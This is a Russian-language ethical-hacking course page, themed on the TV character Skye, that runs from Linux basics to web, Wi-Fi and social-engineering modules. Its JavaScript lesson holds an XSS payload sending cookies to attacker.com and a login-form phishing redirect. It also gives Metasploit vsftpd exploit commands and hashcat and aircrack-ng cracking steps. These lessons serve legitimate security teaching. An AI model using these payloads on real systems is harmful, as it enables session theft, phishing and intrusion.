Академия Скай
Стань как Дейзи Джонсон
От фургона до уровня агента Щ.И.Т. за 12–24 месяца. Полный путь от новичка до профессионала в мире этичного хакинга.
Важное предупреждение об этике!
Весь материал на этом сайте предназначен исключительно для образовательных целей в рамках этичного хакинга. Любые попытки применить полученные знания на реальных системах без явного письменного разрешения владельца являются незаконными и уголовно наказуемыми (ст. 272-274 УК РФ и аналогичные законы в других странах). Мы поддерживаем платформы для легального поиска уязвимостей, такие как HackerOne и Bugcrowd.
Модуль 0: Подготовка
Время: ~1 неделя. Заложи фундамент своего будущего.
Шаг 1: Оборудование и Софт
Тебе не нужен суперкомпьютер. Подойдет любой ноутбук или ПК с минимум 8 ГБ оперативной памяти и 50 ГБ свободного места на диске.
Что нужно установить:
- VirtualBox: Бесплатная система виртуализации. Скачать здесь.
- Kali Linux: Главный инструмент. Мы установим его на виртуальную машину. Скачать образ для VirtualBox.
- Текстовый редактор: VS Code — отличный выбор. Скачать.
Пошаговая установка Kali Linux в VirtualBox:
- Скачайте и установите VirtualBox.
- Скачайте образ Kali Linux для VirtualBox (.ova файл).
- В VirtualBox выберите "Файл" -> "Импорт конфигурации".
- Выберите скачанный .ova файл и следуйте инструкциям. Не меняйте настройки, если не уверены.
- После импорта выберите машину Kali в списке и нажмите "Запустить". Логин по умолчанию:
kali, пароль:kali.
Шаг 2: Создание Аккаунтов
Это твои будущие полигоны. Зарегистрируйся на всех платформах. Используй менеджер паролей (напр. Bitwarden).
"Я никогда не хотела вписываться. Зачем быть винтиком в машине, если можно быть той, кто ее разбирает?" — Скай, размышляя о своем пути
Шаг 3: Первая Команда
Запусти свою Kali Linux. Открой терминал (иконка черного экрана). Поздравляю, ты в "командном центре". Введи эту команду и нажми Enter:
whoami
Система ответит kali. Это твое имя пользователя. Теперь попробуй:
ls -la /
Эта команда показывает все файлы и папки в корневой директории твоей системы. Ты только что заглянул в самое сердце Linux.
Чек-лист Модуля 0
Модуль 1: Основы (Linux + Сети)
Время: 1.5-2 месяца. Научись говорить на языке машин и сетей.
Дисклеймер
Изучение сетевых инструментов, таких как Wireshark, на публичных или корпоративных сетях без разрешения может быть нарушением политики использования. Практикуйтесь в своей изолированной виртуальной среде.
Часть 1: Властелин Командной Строки
Linux — твоя операционная система. Терминал — твой главный инструмент. Ты должен чувствовать себя в нем как дома, быстрее и эффективнее, чем в любом графическом интерфейсе. На это уйдет время, но результат того стоит.
Урок 1.1: Навигация и Осмотр
Прежде чем атаковать, нужно уметь ориентироваться.
# pwd (print working directory) - где я?
pwd
# ls -la (list all, long format) - что вокруг меня?
ls -la
# cd /var/www/html (change directory) - иду туда
cd /var/www/html
Задача: Перейдите в директорию /etc, посмотрите ее содержимое, затем вернитесь в домашнюю директорию одной командой (cd без аргументов).
Урок 1.2: Работа с Файлами и Потоками
Создание, чтение, перенаправление. Данные текут туда, куда ты укажешь.
# cat /etc/passwd - прочитать файл
cat /etc/passwd
# cat /etc/passwd | grep 'root' - прочитать файл и найти строку с 'root'
# | (pipe) - это конвейер, он передает вывод одной команды на вход другой
# echo "Hello, Skye" > hello.txt - записать строку в файл (перезаписать)
echo "Hello, Skye" > hello.txt
# echo "New line" >> hello.txt - добавить строку в конец файла (дописать)
echo "New line" >> hello.txt
Задача: Найдите всех пользователей с оболочкой /bin/bash в файле /etc/passwd и запишите их имена в файл users.txt.
Урок 1.3: Поиск и Фильтрация
Иголки в стоге сена? Не проблема.
# find / -name "secret.txt" - найти файл 'secret.txt' во всей системе
# 2>/dev/null - подавить вывод ошибок (например, "Permission denied")
# grep -r "password" /etc - рекурсивно найти слово "password" во всех файлах в /etc
# locate *.conf - быстро найти все файлы, заканчивающиеся на .conf (использует базу данных)
Задача: Найдите все файлы с расширением .log в директории /var/log, которые были изменены за последние 24 часа.
Урок 1.4: Права Доступа
Кто может читать, писать и исполнять? Основа безопасности Linux.
-rwxr-xr--: -(файл) rwx(владелец) r-x(группа) r--(остальные)
# chmod 744 script.sh - дать права rwx владельцу, r-- группе и остальным
# 7 (rwx) = 4(r)+2(w)+1(x)
# 4 (r--) = 4(r)+0(w)+0(x)
# chown skye:skye file.txt - сменить владельца и группу файла на 'skye'
Задача: Создайте файл, сделайте его исполняемым только для себя. Попробуйте запустить его от имени другого пользователя (если есть).
Плейсхолдер: Гифка/скриншот, где Скай сидит в своем фургоне, окруженная экранами с кодом."Люди думают, что хакинг — это магия. Нет, это просто терпение. Терпение, чтобы найти одну маленькую ошибку в миллионах строк идеального кода." — Скай, объясняя свою философию
Часть 2: Архитектура Сети
Информация перемещается по сети в виде пакетов. Твоя задача — научиться их читать, перехватывать и понимать, как они путешествуют от точки А к точке Б.
Урок 2.1: Модель TCP/IP
Это фундамент. Ты должен понимать, что происходит на каждом уровне.
| Уровень | Название | Роль | Протоколы |
|---|---|---|---|
| 4 | Прикладной | Данные для приложений | HTTP, FTP, DNS, SMTP |
| 3 | Транспортный | Передача данных (порт-в-порт) | TCP, UDP |
| 2 | Сетевой | Маршрутизация пакетов (IP-адреса) | IP, ICMP |
| 1 | Канальный | Физическая передача (MAC-адреса) | Ethernet, Wi-Fi |
Урок 2.2: TCP vs UDP
Два брата: один надежный, другой быстрый.
- TCP (Transmission Control Protocol): Надежный. Гарантирует доставку пакетов в правильном порядке. Использует "трехстороннее рукопожатие" (SYN, SYN-ACK, ACK) для установки соединения. Используется для HTTP, FTP, SSH.
- UDP (User Datagram Protocol): Быстрый. Отправляет пакеты и не заботится, дошли ли они. Нет установки соединения. Используется для DNS, видеостриминга, онлайн-игр.
Урок 2.3: Wireshark — Твой Сетевой Микроскоп
Установи Wireshark (sudo apt update && sudo apt install wireshark). Запусти и начни слушать трафик на своем интерфейсе. Это окно в душу сети.
Полезные фильтры:
# Показать трафик только от/к этому IP
ip.addr == 8.8.8.8
# Показать только DNS-запросы
dns
# Показать только HTTP GET запросы
http.request.method == "GET"
# Показать пакеты, содержащие слово "password" (может не работать с HTTPS)
tcp contains "password"
Задача: Откройте сайт http://example.com (не https!). В Wireshark отфильтруйте HTTP трафик. Найдите GET-запрос от вашего компьютера и ответ от сервера.
Практические Задания и Ресурсы (Цели на 1.5-2 месяца)
Не читай, а делай. Твои цели на этот модуль:
Linux:
Сети:
Тест: Модуль 1
Какой протокол транспортного уровня используется для DNS-запросов из-за его скорости?
Модуль 2: Программирование для Хакера
Время: 2-3 месяца. Автоматизируй всё. Пиши скрипты, которые работают, пока ты спишь.
Часть 1: Python — Твой Швейцарский Нож
Python — главный язык в кибербезопасности. Он простой, мощный и имеет огромное количество библиотек. Ты будешь использовать его для всего: от сканирования сетей до написания эксплойтов.
Урок 2.1: Разведка с `requests`
Библиотека `requests` позволяет отправлять HTTP-запросы так же легко, как это делает браузер. Это основа для парсинга сайтов и тестирования API.
import requests
# Простой GET-запрос
try:
response = requests.get("https://example.com")
print(f"Статус-код: {response.status_code}")
# print(response.text) # Выведет HTML-код страницы
except requests.exceptions.RequestException as e:
print(f"Ошибка: {e}")
# POST-запрос с данными
data_to_send = {'login': 'skye', 'password': 'bad_password'}
response = requests.post("https://some-vuln-site.com/login", data=data_to_send)
Задача: Напишите скрипт, который принимает на вход URL и выводит заголовки ответа сервера (например, `Server`, `Content-Type`).
Урок 2.2: Сканер портов с `socket`
Библиотека `socket` — это низкоуровневый интерфейс для работы с сетью. С ее помощью можно взаимодействовать с любыми TCP/UDP сервисами.
Это улучшенная версия сканера из обзора. Она использует `sys` для чтения аргументов из командной строки.
import socket
import sys
def scan_port(ip, port):
try:
# Создаем новый сокет
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Устанавливаем таймаут, чтобы не ждать вечно
sock.settimeout(0.5)
# Пытаемся подключиться
if sock.connect_ex((ip, port)) == 0:
print(f"[+] Порт {port}: Открыт")
sock.close()
except (socket.error, socket.timeout) as e:
pass # Игнорируем ошибки для чистоты вывода
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Использование: python scanner.py ")
sys.exit()
target_ip = sys.argv[1]
print(f"Сканирую {target_ip}...")
# Сканируем первые 1024 порта
for p in range(1, 1025):
scan_port(target_ip, p)
Задача: Модифицируйте скрипт, чтобы он принимал диапазон портов для сканирования (например, `python scanner.py
Часть 2: Bash и JavaScript
Bash-скриптинг для автоматизации
Bash — это клей, который соединяет все твои инструменты в Linux. Простой цикл может сэкономить часы ручной работы.
Пример: Скрипт для поиска живых хостов в подсети и их сканирования с помощью Nmap.
#!/bin/bash
# Проверяем, что передан аргумент
if [ -z "$1" ]; then
echo "Использование: $0 <подсеть, например, 192.168.1>"
exit 1
fi
PREFIX=$1
for i in {1..254}; do
IP="${PREFIX}.${i}"
# Пингуем хост один раз, без вывода
ping -c 1 $IP | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done
wait
echo "Сканирование завершено."
# Теперь можно передать живые хосты в nmap
# nmap -iL live_hosts.txt
JavaScript для веб-хакинга
Понимание JS необходимо для поиска XSS-уязвимостей. Тебе нужно знать, как работает DOM (Document Object Model) и как его можно манипулировать. Начни с консоли разработчика в браузере (F12).
// Классический alert, доказывающий XSS
alert('XSS PoC');
// Более коварный вариант: кража cookie
// Если на сайте нет защиты HttpOnly, этот код отправит cookie атакующему
var img = document.createElement('img');
img.src = 'http://attacker.com/steal?cookie=' + document.cookie;
document.body.appendChild(img);
// Манипуляция DOM: замена формы входа
document.querySelector('form').action = 'http://attacker.com/login_phish';
Задача: На любом сайте откройте консоль разработчика и попробуйте изменить заголовок страницы командой `document.title = "I am Skye";`.
Практические Ресурсы
Код пишется пальцами, а не чтением.
Модуль 3: Ключевые инструменты
Время: 1.5-2 месяца. Арсенал современного хакера.
"Инструменты не делают хакера, но хороший хакер знает свои инструменты до последнего байта." — Мысль, которая могла бы принадлежать Скай
Урок 3.1: Nmap — Карта Сети
Nmap (Network Mapper) — твои глаза и уши в любой сети. Это не просто сканер портов, это мощный инструмент для разведки, который может определить ОС, запущенные службы и даже найти уязвимости с помощью скриптов.
Основные Сканирования:
# Пинг-сканирование: найти живые хосты в сети, не сканируя порты
nmap -sn 192.168.1.0/24
# SYN-сканирование (Stealth Scan): быстрое и незаметное
sudo nmap -sS 192.168.1.10
# Определение версий служб и ОС
sudo nmap -sV -O 192.168.1.10
# Агрессивное сканирование: включает определение ОС (-O), версий (-sV), скриптовое сканирование (-sC) и трассировку (traceroute)
sudo nmap -A -T4 192.168.1.10
Nmap Scripting Engine (NSE):
Сердце Nmap. Это скрипты на Lua, которые автоматизируют поиск уязвимостей.
# Запустить стандартный набор скриптов
sudo nmap -sC 192.168.1.10
# Искать HTTP-уязвимости
sudo nmap --script "http-*" -p 80 192.168.1.10
Урок 3.2: Burp Suite — Манипуляция Вебом
Burp Suite — это швейцарский нож для веб-пентеста. В бесплатной Community Edition тебе доступны ключевые инструменты.
- Proxy: Ядро Burp. Настрой свой браузер для работы через прокси Burp (127.0.0.1:8080). Теперь ты видишь абсолютно все запросы, которые браузер отправляет на сервер, и можешь их изменять.
- Repeater: Позволяет взять любой запрос, изменить в нем что угодно (параметры, заголовки, cookie) и отправить повторно, чтобы посмотреть на реакцию сервера. Идеально для ручного тестирования уязвимостей.
- Intruder: Инструмент для автоматизации атак. Используется для брутфорса паролей, фаззинга параметров или перебора идентификаторов (IDOR).
Урок 3.3: Остальной Арсенал
Gobuster / ffuf — Поиск Скрытого
Эти инструменты ищут скрытые директории и файлы на веб-сервере, перебирая их имена по словарю.
gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Hashcat / John the Ripper — Взлом Паролей
Если ты нашел хэш пароля в базе данных, эти инструменты попытаются его вскрыть.
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Metasploit Framework
Огромная база эксплойтов. Если Nmap нашел уязвимую службу, велика вероятность, что в Metasploit уже есть готовый модуль для ее эксплуатации.
msfconsole
search vsftpd 2.3.4
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.10
exploit
Практические Задания Модуля 3
Модуль 4: Веб-уязвимости
Время: 3-5 месяцев. Самый большой и важный блок. 90% хакинга сегодня — это веб.
"Каждый сайт — это город со своими секретными проходами. Большинство людей ходят по главным улицам. Я ищу задние двери." — Скай
Урок 4.1: Мышление веб-хакера и OWASP Top 10
Твоя цель — не просто найти уязвимость, а понять логику приложения и найти в ней изъян. OWASP Top 10 — это твой путеводитель по самым частым ошибкам разработчиков.
- A01:2021-Broken Access Control — Нарушение контроля доступа. Могу ли я, будучи обычным юзером, получить доступ к админ-панели, поменяв ID в URL? (
/user/123->/admin/1) - A02:2021-Cryptographic Failures — Криптографические провалы. Хранятся ли пароли в базе данных в открытом виде? Используется ли слабое шифрование?
- A03:2021-Injection — Внедрение. Самый известный представитель — SQL-инъекция. Что если в поле для ввода имени я вставлю часть SQL-запроса?
- A04:2021-Insecure Design — Небезопасный дизайн. Фундаментальные ошибки в логике приложения.
- A05:2021-Security Misconfiguration — Небезопасная конфигурация. Оставленные по умолчанию пароли, включенный режим отладки, облачные хранилища с публичным доступом.
- A06:2021-Vulnerable and Outdated Components — Уязвимые и устаревшие компоненты. Использует ли сайт старую версию WordPress или jQuery с известными уязвимостями?
- A07:2021-Identification and Authentication Failures — Ошибки идентификации и аутентификации. Можно ли обойти вход в систему? Легко ли подобрать пароль?
- A08:2021-Software and Data Integrity Failures — Нарушения целостности ПО и данных. Например, десериализация небезопасных данных.
- A09:2021-Security Logging and Monitoring Failures — Недостатки логирования и мониторинга. Как долго система не замечает, что ее атакуют?
- A10:2021-Server-Side Request Forgery (SSRF) — Подделка запросов на стороне сервера. Могу ли я заставить сервер приложения обратиться к внутренним ресурсам, к которым у меня нет доступа напрямую?
Урок 4.2: Практика — PortSwigger Web Security Academy
Это твой основной ресурс на ближайшие месяцы. Твоя задача — пройти ВСЕ бесплатные лаборатории. Это более 200 практических заданий, которые сделают из тебя настоящего веб-хакера. Не торопись, вникай в каждую.
Путь обучения:
Этап 1: SQL Injection
Этап 2: Cross-Site Scripting (XSS)
Этап 3: Контроль доступа и другие уязвимости
Модуль 5: Сети, Wi-Fi и Social Engineering
Время: 2-3 месяца. Атака выходит за пределы веба.
"Дело не в том, что ты взламываешь, а в том, кого ты взламываешь. Люди — самая предсказуемая и одновременно самая непредсказуемая система." — Скай, готовясь к OSINT-операции
Урок 5.1: OSINT — Искусство Знать Всё
Open-Source Intelligence (OSINT) — это сбор и анализ информации из публично доступных источников. Прежде чем прикоснуться к цели, ты должен знать о ней всё: технологии, сотрудников, email-адреса, поддомены.
Инструменты для OSINT:
- theHarvester: Собирает email'ы, поддомены, имена сотрудников из разных источников (Google, Bing, LinkedIn).
theharvester -d example.com -b google,linkedin - Maltego: Мощный инструмент для визуализации связей. Помогает строить графы отношений между доменами, людьми, email и компаниями.
- Recon-ng: Фреймворк для OSINT-разведки, похожий на Metasploit. Имеет модульную структуру для сбора информации.
- Shodan: Поисковик по "Интернету вещей". Ищет не сайты, а устройства: веб-камеры, роутеры, промышленные контроллеры.
Урок 5.2: Социальная Инженерия — Взлом Человека
Самая опасная уязвимость в любой системе — это доверие человека. Социальная инженерия — это набор техник для манипуляции людьми с целью заставить их совершить определенные действия (отдать пароль, запустить файл).
Основные техники:
- Фишинг: Массовая рассылка поддельных писем (например, от имени банка) с целью кражи учетных данных.
- Целевой фишинг (Spear Phishing): То же самое, но письмо тщательно готовится под конкретного человека или небольшую группу, используя информацию из OSINT.
- Претекстинг: Создание вымышленного сценария (легенды) для получения информации. Например, звонок в техподдержку от имени сотрудника.
Инструменты: Gophish — фреймворк для проведения фишинговых кампаний. Social-Engineer Toolkit (SET) в Kali Linux.
Урок 5.3: Wi-Fi Hacking
Для атак на Wi-Fi требуется специальный адаптер, поддерживающий режим мониторинга и инъекцию пакетов (например, Alfa AWUS036ACH).
Основной набор инструментов — Aircrack-ng suite.
- airmon-ng: Перевод адаптера в режим монитора.
airmon-ng start wlan0 - airodump-ng: Сканирование эфира для обнаружения точек доступа и клиентов.
airodump-ng wlan0mon - aireplay-ng: Деаутентификация клиентов для перехвата "рукопожатия" (handshake).
- aircrack-ng: Взлом перехваченного рукопожатия WPA/WPA2 по словарю.
aircrack-ng -w /path/to/wordlist.txt capture.cap
Практические Задания Модуля 5
Модуль 6: Продвинутый Уровень + CTF/Red Team
Время: 4-6 месяцев. Переход от студента к профессионалу.
Active Directory & Exploit Development
Большинство корпоративных сетей работают на Active Directory. Научись их атаковать (Kerberoasting, Pass-the-Hash). Изучи основы переполнения буфера (Buffer Overflow) — это классика, которая учит понимать, как работает память компьютера.
Участие в CTF и Bug Bounty
Теория мертва без практики. Начни участвовать в CTF на Hack The Box. Выбери простую программу на HackerOne с широким скоупом и начни искать уязвимости. Даже если ничего не найдешь, ты многому научишься.
Модуль 7: Сертификаты и Карьера
Время: Постоянно. Докажи свои навыки и найди работу мечты.
"Взломать систему — это только начало. Настоящая цель — построить себе будущее, в котором ты сам устанавливаешь правила." — Скай, размышляя о своей независимости
Урок 7.1: Карта Сертификаций
Сертификаты — это не самоцель, а способ доказать рынку, что твои навыки реальны. Они структурируют знания и открывают двери на собеседования.
1. eJPT (eLearnSecurity Junior Penetration Tester)
Твой первый шаг. Полностью практический экзамен, где нужно провести тест на проникновение в небольшой корпоративной сети. Отличная проверка базовых навыков.
2. PenTest+ / CEH (CompTIA / EC-Council)
Более теоретические, но признаются многими компаниями, особенно в корпоративном секторе и госструктурах. Помогают закрепить терминологию и методологии.
3. OSCP (Offensive Security Certified Professional)
Золотой стандарт. 24-часовой практический экзамен, где нужно взломать несколько машин. Девиз — "Try Harder". Наличие OSCP сразу выделяет тебя из толпы. Подготовка к нему — это отдельный марафон на 3-6 месяцев интенсивной практики на площадках вроде Hack The Box и Proving Grounds.
Урок 7.2: Твое Цифровое Портфолио
В мире хакинга твое резюме — это не документ Word. Это совокупность твоих цифровых следов, доказывающих твою страсть и компетентность.
- Профиль GitHub: Здесь должны быть твои скрипты для автоматизации, модифицированные эксплойты, конспекты. Это показывает, что ты умеешь писать код.
- Профиль Hack The Box / TryHackMe: Твой ранг и решенные машины говорят сами за себя. Рекрутеры это проверяют.
- Блог (Medium, GitHub Pages): Пиши райтапы (прохождения) интересных машин с CTF. Это показывает твой образ мыслей и умение объяснять сложные вещи.
- Профиль HackerOne/Bugcrowd: Даже найденные дубликаты или уязвимости с низким рейтингом — это реальный опыт, который ценится гораздо выше, чем отсутствие опыта.
Задания на Будущее
Ежедневный ритуал Скай
Дисциплина важнее мотивации.
Галерея Мотивации
Вспомни, зачем ты здесь.
Неповиновение системе
Скай использовала свои навыки, чтобы бросить вызов могущественной организации, веря в свободу информации. Твои навыки — это инструмент перемен.
От одиночки к командному игроку
Даже самый гениальный хакер сильнее в команде. Она научилась доверять и работать с другими, чтобы достигать больших целей.